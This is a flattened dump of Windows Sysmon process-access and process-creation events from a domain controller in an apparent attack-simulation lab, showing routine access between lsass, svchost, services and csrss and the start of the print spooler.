08:41:21.888{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.888{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.887{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.887{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.885{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.885{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.879{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.879{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.878{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.872{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.872{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.868{5D479F2C-169F-5F84-0A00-000000007F01}856948C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.861{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.860{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.849{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe10.0.14393.3808 (rs1_release.200707-2105)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.845{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.844{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 